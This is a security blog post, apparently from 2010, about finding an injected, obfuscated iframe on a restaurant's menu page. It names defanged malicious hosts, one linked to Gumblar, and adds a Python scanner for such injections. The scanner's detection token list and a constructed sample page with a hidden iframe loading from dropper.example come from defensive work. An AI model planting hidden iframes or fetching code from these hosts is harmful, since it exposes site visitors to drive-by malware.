Michal Krejdl

19 March 2010

Would you like an iframe, sir?

Yesterday, when I was about to get something to eat, my attempt to check a menu online ended up with a warning about HTML:Iframe-LZ. Well, that's quite spicy content for a common daily offer. So, let's look at what's under the hood.

Starter: a piece of JavaScript at the end of the page, served in a nicely roasted layer of obfuscation. Really delicious.

Main course: you can choose either a speciality of Chinese cuisine delivered by hxxp://b.nt002.cn/E/J.JS (fortunately already down) or a Russian shashlik that contains some popular ingredients (such as google, classmates or linkhelper) in the following order: hxxp://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru: 8080/ocn.ne.jp/ocn.ne.jp/ classmates.com/linkhelper.cn/google.com/ (also already down, but these two links belong to a Gumblar system).

Dessert: a nice little snippet to carry the execution of all the malcode.
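The three courses above are the classic injected-iframe recipe: an obfuscated script appended at the end of an otherwise legitimate page, which writes out a hidden iframe pointing at a third-party host. The following is an added example, not code from the original post or from the author's analysis tooling: a small Python scanner that flags both signals in a page, using constructed sample HTML and placeholder host names (`menu.example`, `dropper.example`). It generalizes slightly beyond the post by also treating zero-size or off-screen iframes and high-entropy script bodies as indicators.

```python
"""Heuristic scanner for the injected-iframe pattern: obfuscated JavaScript near
the end of the page plus a hidden iframe loading content from a foreign host.
Added example; sample HTML and host names below are constructed placeholders."""
import math
import re
from urllib.parse import urlparse

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I | re.S)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

# Tokens commonly seen in obfuscated droppers: decode-then-execute primitives
# and escaped string fragments. Two or more together is the trigger.
OBFUSCATION_TOKENS = ("eval(", "unescape(", "fromCharCode", "document.write(", "\\x", "%u")


def shannon_entropy(s):
    """Bits per character; escaped/encoded blobs score noticeably higher than plain code."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_attrs(raw):
    """Turn the inside of a tag into a lowercase attribute dict."""
    attrs = {}
    for m in ATTR_RE.finditer(raw):
        attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
    return attrs


def suspicious_scripts(html, tail_fraction=0.25):
    """Report inline scripts with obfuscation markers; note whether they sit in the page tail."""
    findings = []
    total = len(html)
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        hits = [t for t in OBFUSCATION_TOKENS if t in body]
        if len(hits) < 2:
            continue
        findings.append({
            "offset": m.start(),
            "near_end": m.start() >= total * (1 - tail_fraction),
            "tokens": hits,
            "entropy": round(shannon_entropy(body), 2),
        })
    return findings


def suspicious_iframes(html, page_host):
    """Report iframes that are hidden, tiny, off-screen, or sourced from another host."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        reasons = []
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via style")
        if "left:-" in style or "top:-" in style:
            reasons.append("positioned off-screen")
        tiny = re.compile(r"[01](px)?")
        if tiny.fullmatch(attrs.get("width", "").strip()) or tiny.fullmatch(attrs.get("height", "").strip()):
            reasons.append("zero-size frame")
        host = urlparse(attrs.get("src", "")).hostname
        if host and host.lower() != page_host.lower():
            reasons.append("external host " + host)
        if reasons:
            findings.append({"src": attrs.get("src", ""), "reasons": reasons})
    return findings


def scan(html, page_host):
    """Combine both heuristics; flag the page when either one fires."""
    scripts = suspicious_scripts(html)
    frames = suspicious_iframes(html, page_host)
    return {"scripts": scripts, "iframes": frames, "suspicious": bool(scripts or frames)}


# Constructed sample pages (not real content): a clean menu and the same menu
# with an appended obfuscated script and a hidden iframe.
FILLER = "".join(f"<li>Dish {i}</li>" for i in range(60))
CLEAN_HTML = ("<html><body><h1>Daily menu</h1><ul>" + FILLER + "</ul>\n"
              "<script>document.getElementById('menu');</script>\n</body></html>")
INJECTED_HTML = (
    "<html><body><h1>Daily menu</h1><ul>" + FILLER + "</ul>\n"
    "<script>var s=\"\\x3c\\x69\\x66\\x72\\x61\\x6d\\x65\";"
    "document.write(unescape('%3c%69%66%72'));eval(String.fromCharCode(118,97,114));</script>\n"
    "<iframe src=\"http://dropper.example/j.js\" width=\"0\" height=\"0\" style=\"display:none\"></iframe>\n"
    "</body></html>"
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_HTML), ("injected", INJECTED_HTML)):
        print(name, scan(page, "menu.example"))
```

Running the module prints no findings for the clean page and, for the injected one, a script finding (near the end, several decode/execute tokens) plus an iframe finding with three reasons. The heuristics are deliberately coarse: a site's own legitimate analytics snippet can trip the token rule, so in practice the result is a triage signal to diff against a known-good copy of the page, not a verdict on its own.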

Anyone else hungry out there? :-)
